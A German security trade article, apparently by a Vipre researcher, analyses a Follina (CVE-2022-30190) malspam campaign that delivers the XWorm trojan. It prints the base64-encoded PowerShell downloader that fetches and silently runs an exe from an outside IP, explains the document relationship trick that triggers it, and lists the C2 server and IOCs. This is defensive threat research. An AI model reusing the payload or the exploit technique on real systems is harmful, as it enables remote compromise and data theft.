:quality(80)/p7i.vogel.de/wcms/9c/bb/9cbb5825efdfea727b826d3f0463dd9b/0108252158.jpeg "Mitarbeiter geraten heute schnell ins Visier von Cyberkriminellen. Nur durch Security Awareness Trainings können sie diese Tricks rechtzeitig erkennen. (Bild: Funtap - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/01/d9/01d96a53f8d2a111e5a98976be1cfff3/0108278988.jpeg "Wir kommen in Zukunft zwar vielleicht ohne Passwörter aus, aber Access-Management-Lösungen zur Authentifizierung und Autorisierung der Benutzer werden weiterhin dringend gebraucht. (Bild: adam121 - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/e9/34/e93444cbcc0f518c1bc0a005dc36147c/0108250229.jpeg "Enterprise Network Firewalls schützen das Unternehmensnetz vor einer Vielzahl möglicher Attacken. Von klassischen DDoS-Angriffen über Trojaner und Malware in verschlüsselten Datenübertragungen, bis hin zu Advanced Persistent Threats. (Bild: valerybrozhinsky - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/63/72/6372be7ef046411435e68c6203994823/0114113443.jpeg "Threat Intelligence Feeds sind ein wichtiges Tool für Unternehmen, zum Schutz vor DDoS-Angriffen. (Bild: Framestock - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/fc/97/fc9738083cd07dfe9c89c949eb0c40aa/0114113294.jpeg "Microsoft Teams wird in vielen Unternehmen als Kommunikationsplattform genutzt. Immer öfter greifen Hacker gezielt Teams an. Unternehmen müssen reagieren und sich besser schützen! (Bild: Kiattisak - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/9a/c7/9ac7c7e8a3b32a83049dfc945e67b476/0113571100.jpeg "Der Angriff auf Wale mit einer solchen eisernen Harpune ist brutal und sehr blutig; ein Phishing-Angriff mithilfe von Ki ist hinterhältig und gnadenlos - nur nicht so blutig. (Bild: frei lizenziert: FotoArt-Treu)")
:quality(80)/p7i.vogel.de/wcms/59/60/5960c42975dff727adfac6a471bc7428/0114147994.jpeg "Obwohl 90 Prozent der Befragten glauben, dass ihre aktuellen Tools zur Erkennung von Bedrohungen effektiv sind, befürchten 97 Prozent, einen relevanten Sicherheitsvorfall zu verpassen. (Bild: Tobias - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/88/a4/88a4cea0faefd5e74cc9bd5a9fb4ca87/0114037795.jpeg "Wird künstliche Intelligenz zum treuen Partner bei der Verteidigung von Unternehmensnetzen und sensiblen Daten oder zum unbezwingbaren Feind, der alles überrollt? (Bild: sdecoret - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/59/6c/596c4be93de433a4c8df15a6e71a07e1/0113377765.jpeg "Der Lepide Active Directory Auditor hilft auch aktiv dabei, Ransomware-Angriffe schnell zu erkennen und damit schnell reagieren zu können. (Bild: Lepide)")
:quality(80)/p7i.vogel.de/wcms/13/09/13099874e6859350b3819761430047fb/0114005981.jpeg "Jubel, Trubel und Gedränge – neben Taschendieben machen auch immer mehr Cyberkriminelle auf großen Veranstaltungen wie dem Münchner Oktoberfest ihr „Geschäft“. (Bild: frei lizenziert Pexels - Pixabay)")
:quality(80)/p7i.vogel.de/wcms/93/4a/934ad835e86c1eea66869d7d9a59f1f1/0113980249.jpeg ""Integrierte Sicherheit gegen wachsende Cyberbedrohungen", ein Interview von Oliver Schonschek, Insider Research, mit Frank Kuypers von Intel Corporation. (Bild: Vogel IT-Medien / Intel / Schonschek)")
:quality(80)/p7i.vogel.de/wcms/ea/09/ea098195a5d78217dbe8e7be250c803f/0113981663.jpeg "Wie die Geschäftsentwicklung von Cequence unterstreicht, wird Anwendungssicherheit für Unternehmen ein zunehmend wichtiger Faktor. (Bild: The Walker Group)")
:quality(80)/p7i.vogel.de/wcms/13/56/1356472468aa93a42551824e15bc86d1/0114006798.jpeg "Mit dem richtigen Löschkonzept schaffen es auch KMU, personenbezogene Daten strukturiert und sicher zu löschen. (Bild: Mego-studio - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/3a/0e/3a0e510718ff64c8142c752d9244e514/0114089617.jpeg "Durch einen kompromittierten Microsoft-Account und einen ungeschützten Crash-Dump konnte die Hackergruppe Storm-0558 einen Master-Signatur-Schlüssel von Microsoft stehlen. Die Folgen sind gravierend. (Bild: Skórzewiak - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/56/e8/56e81a2cc5d033e060c48271040ce400/0114030088.jpeg "Angriffe auf die kritische Infrastruktur werden weiter zunehmen und Phishing wird ein wichtiger Angriffsvektor sein. Eine Phishing-sichere MFA kann helfen Risiken zu minimieren. (Bild: Urupong - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/29/21/2921b37e9174454514f87109f30498da/0113796994.jpeg "Sicherheitsverantwortliche müssen in hybriden IT-Landschaften oft verschiedene Multi-Faktor-Authentifizierungen in einem System vereinen. (Bild: ArtemisDiana - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/16/5f/165f68c6fa324facb4015349f0aabf97/0114113075.jpeg "Um mit KI-basierten Bedrohungen mithalten zu können, kommen Unternehmen nicht umhin, KI-basierte Abwehrmaßnahmen zu nutzen. (Bild: soupstock - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/67/e4/67e44f84835d9f919003ad8dbf03d436/0114086650.jpeg "Mitarbeitende und Unternehmen in Deutschland nehmen ihre Verantwortung bei der IT-Sicherheit nicht im geforderten Ausmaß ernst. (Bild: NicoElNino - stock.adobe.com)")
:quality(80)/p7i.vogel.de/wcms/67/8f/678f3451fbd3cc9e468de0e35f73ee4d/0112115118.jpeg "Unter Desktop-as-a-Service versteht man virtuelle Desktops als Service eines Cloud-Anbieters. (Bild: gemeinfrei)")
:quality(80)/p7i.vogel.de/wcms/65/23/6523a9c3297be435577880eaf0ee43e4/0112115110.jpeg "Der Digital Operational Resilience Act (DORA) ist eine am 16.01.2023 in Kraft getretene EU-Verordnung über die digitale operative Resilienz im Finanzsektor. (Bild: gemeinfrei)")
:quality(80)/p7i.vogel.de/wcms/09/9d/099d49006288e13bbb864fed5bf6c5be/0113940732.jpeg "Maltego ist ein Data-Mining-Tool mit visueller Graphendarstellung. Das interaktive Werkzeug wird auch von Sicherheitsanalysten und Behörden zur Informationssuche und -darstellung eingesetzt. (Bild: Maltego Technologies)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804272/original.jpg "XDR (Extended Detection and Response) erkennt Angriffe auf Endpoints frühzeitig. (Darwin Laganzon)")
:quality(80)/images.vogel.de/vogelonline/bdb/1804200/1804284/original.jpg "Eine wirksame Notfallvorsorge muss auch fortschrittliche Attacken vorhersehen. (Tumisu)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801554/original.jpg "Der Schutz von Operational Technology erfordert spezielle Security-Maßnahmen. (Gerd Altmann)")
:quality(80)/images.vogel.de/vogelonline/bdb/1801500/1801534/original.jpg "Security-by-Design ist bei Cloud-Apps besonders wichtig. (Werner Moser)")
Schadsoftware-Infektion via Office-Dokumente Analyse eines Makro-freien Malware-Angriffs
Anbieter zum Thema
:fill(fff,0)/p7i.vogel.de/companies/64/37/6437ab67aaef3/ftapi-icon--1c9045.png "ftapi-icon--1c9045 (FTAPI Software GmbH)"){kind=icon}
:fill(fff,0)/p7i.vogel.de/companies/63/21/6321c5a61e622/09-spec-color-white-space-mne-logo.jpeg "09-spec-color-white-space-mne-logo (Specops Software GmbH)"){kind=logo}
Im Jahr 2022 hat Microsoft damit begonnen, VBA-Makros für Microsoft Office standardmäßig zu deaktivieren. Ziel war es zu verhindern, dass Angreifer Makros nutzen, um eine Malware-Payload zu platzieren. Aber wie so oft, ist es Angreifern gelungen, sich rasch an die Veränderungen anzupassen und neue Wege, sprich Angriffsvektoren zu finden.
Im ersten Quartal 2023 konnten die Sicherheitsforscher der Vipre Security Group einen abrupten Anstieg von Microsoft OneNote-Dateien beobachten, die als Angriffsvektor genutzt wurden – geeignet verschiedene Malware-Familien wie AsyncRAT, RedLine, Qakbot usw. zu verbreiten. Parallel dazu wurde verstärkt sogenanntes HTML Smuggling genutzt, um Schadsoftware unterzubringen. Diesmal stießen die Forscher noch auf eine andere Art der Verbreitung, bei der sich Angreifer die Schwachstelle CVE-2022-30190 zunutze machen konnten.
:quality(80)/p7i.vogel.de/wcms/67/47/6747f808e366c60193e3388ffdf99d6c/0112938199.jpeg "Angriffsverlauf, bei dem die als „Follina“ bekannte Schwachstelle ausgenutzt wird: Erst jüngst deckten die Sicherheitsforscher der VIPRE Labs eine neue Malspam-E-Mail-Kampagne auf, die einen \".docx\"-Anhang enthält. Der Dateianhang nutzt die Sicherheitslücke CVE-2022-30190 aus. Dazu wird im ersten Schritt eine Spam-E-Mail mit der manipulierten docx/rtf-Datei an das Opfer geschickt. In der Datei verbirgt sich ein Trojaner, der eine bösartige Referenzseite aufruft. Hier wird Javascript und eine kodierte Powershell geladen. Javaskript ruft anschließend ms-msdt auf, um Powershell auszuführen. Nach dem Herunterladen der manipulierten PowerShell wird die Malware-Payload auf dem Rechner des Opfers ausgeführt.")
:quality(80)/p7i.vogel.de/wcms/49/9b/499b127e2e307129ab57f94defa9ba80/0112938197.jpeg "So sieht die betreffende Malspam-E-Mail mit dem typischen docx-Anhang aus.")
:quality(80)/p7i.vogel.de/wcms/1c/94/1c94096bbb5f885f663d7d1b2ff3f83a/0112938200.jpeg "Die docx-Datei nach dem Öffnen.")
:quality(80)/p7i.vogel.de/wcms/64/8b/648be326552f844d3efd6d0c53944f14/0112938202.jpeg "Die Forscher der VIPRE Labs haben die im Word-Dokument gespeicherte Datei „document.xml.rel“ untersucht und eine verdächtige TCP-Verbindung in der geöffneten docx-Datei gefunden.")
Die Schwachstelle CVE-2022-30190, auch unter dem Namen Follina bekannt, wurde im Jahr 2022 entdeckt. Sie nutzt einen legitimen Microsoft-Dienst, Microsoft Support Diagnostic Tool (MSDT), der auf anfälligen Systemen eine Remotecodeausführung ermöglicht. Die Schwachstelle ist nicht neu, wird aber weiterhin ausgenutzt. Dabei kann ein Angreifer auf eine externe Ressource verweisen, die anschließend eine bösartige HTML-Seite aufruft. Diese Seite nutzt den MSDT-URI-Protokoll-Handler, um beliebigen Code oder Befehle auszuführen, z. B. PowerShell. Die Datei msdt.exe wird als untergeordneter Prozess gestartet, sobald das HTML-Dokument in WinWord referenziert wird.
Das Besondere daran ist, dass man kein Microsoft-Dokumentenmakro benötigt, um die Malware zu verteilen. Der Angreifer muss das Opfer nur dazu bringen, das speziell gestaltete Microsoft-Dokument zu öffnen, um die Schwachstelle ausnutzen zu können. Der Angriff lässt sich zudem unabhängig davon ausführen, ob die Datei schreibgeschützt oder im Protection Mode ist – und es ist bei allen Microsoft Office-Versionen möglich.
Erst kürzlich stieß Vipre Labs auf eine Malspam-E-Mail-Kampagne mit einem docx-Dateianhang. Beim Öffnen der Datei erhält das Opfer die Meldung „This document contains a link that may refer to another file. Do you want to update this document with the data from the link files? “ („Dieses Dokument enthält einen Link, der auf eine andere Datei verweisen kann. Möchten Sie dieses Dokument mit den Daten aus den Verknüpfungsdateien aktualisieren?“). Die Datei enthält auch eine willkürlich erstellte ID und Karteninformationen.
Das Opfer könnte fälschlich davon ausgehen, dass es sich um eine normale Microsoft-Dokument-Datei handelt. Das aber ist nicht der Fall, denn im Hintergrund laufen nun bösartige Aktivitäten ab. Eines der Beispiele ist eine verdächtige TCP-Verbindung zu 45[.]76[.]53[.]253, die verwendet wird, um bösartige Dateien zu hosten.
Für diese Art von Angriff hat Vipre Labs die im Word-Dokument gespeicherte Datei „document.xml.rel“ untersucht. Der Angreifer verändert diese Datei, und sie enthält zudem eine bösartige externe URL-Ressource, die aufgerufen wird, sobald das Opfer das Dokument anklickt. In „document.xml.rels“ steckt ein Relationship-Tag vom Typ „oleObject, targetMode external“, das auf eine verdächtige URL verweist. Am Ende der URL findet sich ein „!“-Zeichen, das eine wichtige Rolle beim Auslösen der HTML-Payload spielt.
Der gefundene referenzierte externe Ressourcenlink hxxp://45[.]76[.]53[.]253/24[.]html enthält ein Javascript, das MSDT und Invoke-Expression verwendet, um ein PowerShell-Skript auszuführen, das mit base64 kodiert wurde:
VHJ5IHskd2M9bmV3LW9iamVjdCBzeXN0ZW0ubmV0LndlYmNsaWVudDskd2MuZG93bmxvYWRmaWxlKCJodHRwOi8vNjUuMjEuNzYuMTU3LzA1MjR4ODYxMi5leGUiLCIkRU5WOnRlbXBcd3N0bXAuZXhlIik7fSBDYXRjaCB7RXhpdCgxKTt9OyRjbWQgPSAiJEVOVjp0ZW1wXHdzdG1wLmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgcnVuZGxsMzIuZXhlIHBjd3V0bC5kbGwsTGF1bmNoQXBwbGljYXRpb24gJGNtZCI7JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7==Analyse des Powershell-Skripts
Dieses Skript lädt eine auf „hxxp://65[.]21[.]76[.]157/0524×8612[.]exe“ gehostete, ausführbare Datei mit dem Namen „wstmp.exe“ in das Verzeichnis %temp% herunter. Die heruntergeladene Payload wird dann mit Hilfe von „pcwut.dll“ und ihrer Funktion LaunchApplication ausgeführt. Das PowerShell-Skript beendet auch den untergeordneten Prozess msdt.exe, der zum Aufrufen der bösartigen externen Ressource diente. Das Opfer bemerkt die Ausführung des PowerShell-Skripts nicht, da sie aufgrund des Arguments „windowstyle hidden“ im Hintergrund abläuft.
Analyse der bösartigen Datei „wstmp.exe“
Die Sicherheitsforscher der Vipre Labs haben herausgefunden, dass die endgültige Payload für diese Kampagne mit der XWorm-Malware in Verbindung steht. XWorm ist eine ausgefeilte Art von Malware und wurde zusammen mit anderen bösartigen Tools im Dark Web verkauft. Diese Malware wurde in.NET kompiliert und ist ein Beispiel für einen Remote Access-Trojaner. Das analysierte Beispiel hat sich anhand der Dateiinformationen als eine Datei ausgegeben, die mit dem Antivirusprogramm „AVG“ in Verbindung steht. Die für die Ausführung zu verwendenden Zeichenfolgen sind verschlüsselt und werden mit dem Rijndael-Algorithmus entschlüsselt.
| Verschlüsselte Daten | Entschlüsselter Wert | Verwendung |
|---|---|---|
| qnHEPIgMHs/dPMCMgzBbKj+Q1iV2TYINOOe1LpIrICc= | port3000newspm[.]duckdns[.]org | C2-Server |
| prm15cJXncKmjac47aHAmA== | 3000 | Port |
| A2vXrjTo3SRo0CuOifuHJw== | 123456789 | Schlüssel |
| Otu6jLKlPOiVYjEK+SKmkQ== | Xwormmm | SPL |
| GxATa6g51MsEXZHXcfH+uA== | USB.exe | USBNM |
Sobald die Malware mit dem C2-Server des Angreifers verbunden ist, verfügt sie über folgende Eigenschaften und Fähigkeiten:
- Ransomware-ähnliches Verhalten (Verschlüsselung und Entschlüsselung von Dateien)
- Stehlen vertraulicher Daten des Opfers, z. B. Passwörter
- Ausspionieren des Opfer-Rechners (Keylogging, Webcam- und Mikrofonüberwachung)
- Durchführen eines Denial-of-Service-Angriffs (DDoS)
- Herunterfahren oder Neustart des Computers
- Versteckte virtuelle Netzwerkberechnungen
- Versteckte Remote-Desktop-Protokollierung (RDP)
- Sich hartnäckig festsetzen
Wie kann man verhindern, Opfer solcher Angriffe zu werden?
- Die E-Mail-Adresse des Absenders immer überprüfen
- Den gesamten Inhalt der E-Mail analysieren
- Nach Rechtschreib- oder Grammatikfehlern suchen
- Keine verdächtigen oder unerwartet erhaltenen Links und Dateien anklicken
- Das Antivirusprogramm kontinuierlich aktualisieren
Indicators of Compromise
EML-Dateien:
- fbf6e780378c09182e08a438fba6a9e1b79a380c8e07648d0dca23406c4f7c7e
- 646b68376bedd1a326f2f81caa40fc3a06e10f4af4a6e0101a10ab9bc5ce9cb7
- f3e831e037ddb46a4cbad7e1d70e58d880f4defdba6c1bfa858ae697c04730ad
- c8368bf875cc4c23e1b23976c630a52798ed0e6d8754c21d93f9e9f5ddc133eb
- bda578349aaaa540eff7646d75f1c54e6e743e9f5295dd52a6d5690ccd0c5ef6
Docx-Dateien:
- 20c49ebbe8f13df1f845726faef7663b50db411a3fb72f0cb4538acaba2db26b
- 88d921f668be40db6db9aff2cc58544bc82d16a4c3a45a6306f3878daba83e0d
- 5af433a792c0c3d7995d2eb5fc3105b61344224c127f1b2c509721c3e9700806
- 61fdd0900f250f934c692ff323196ca78bb9f26524ec12c1b33b1d4fbae550a2
- f842f32869a80152d421ba78c61bc91a7655c6917dbd58bc0de7f25c1f1b8da4
URLs:
- hxxp://65[.]21[.]76[.]157/0524×8612[.]exe
- hxxp://45[.]76[.]53[.]253/24[.]html
XWorm Malware
- e88cb3502ff2535e7bc40dfb94fa85a7a334bd90054eb2ef01f07b348569bd90
Über den Autor: Paul Apostolescu ist Chief Architect bei Vipre Security.
(ID:49621193)
:quality(80)/images.vogel.de/vogelonline/bdb/1945800/1945861/original.jpg "Microsoft 365 ist für Unternehmen auf der ganzen Welt ein wichtiges Tool bei der Zusammenarbeit von entfernten, vermehrt die Cloud nutzenden Mitarbeitern. Aber wer sich auf die Zugänglichkeit von Microsoft 365 verlässt, muss auch darauf vorbereitet sein, dass Angreifer das Gleiche tun. (peshkov - stock.adobe.com)")
:quality(80)/images.vogel.de/vogelonline/bdb/1944800/1944859/original.jpg "Microsoft hilft Admins mit dem Microsoft Security Compliance Toolkit dabei, Sicherheitseinstellungen für Windows Server 2022 und Windows 11 im Netzwerk über Gruppenrichtlinien zu verteilen. (Gorodenkoff - stock.adobe.com)")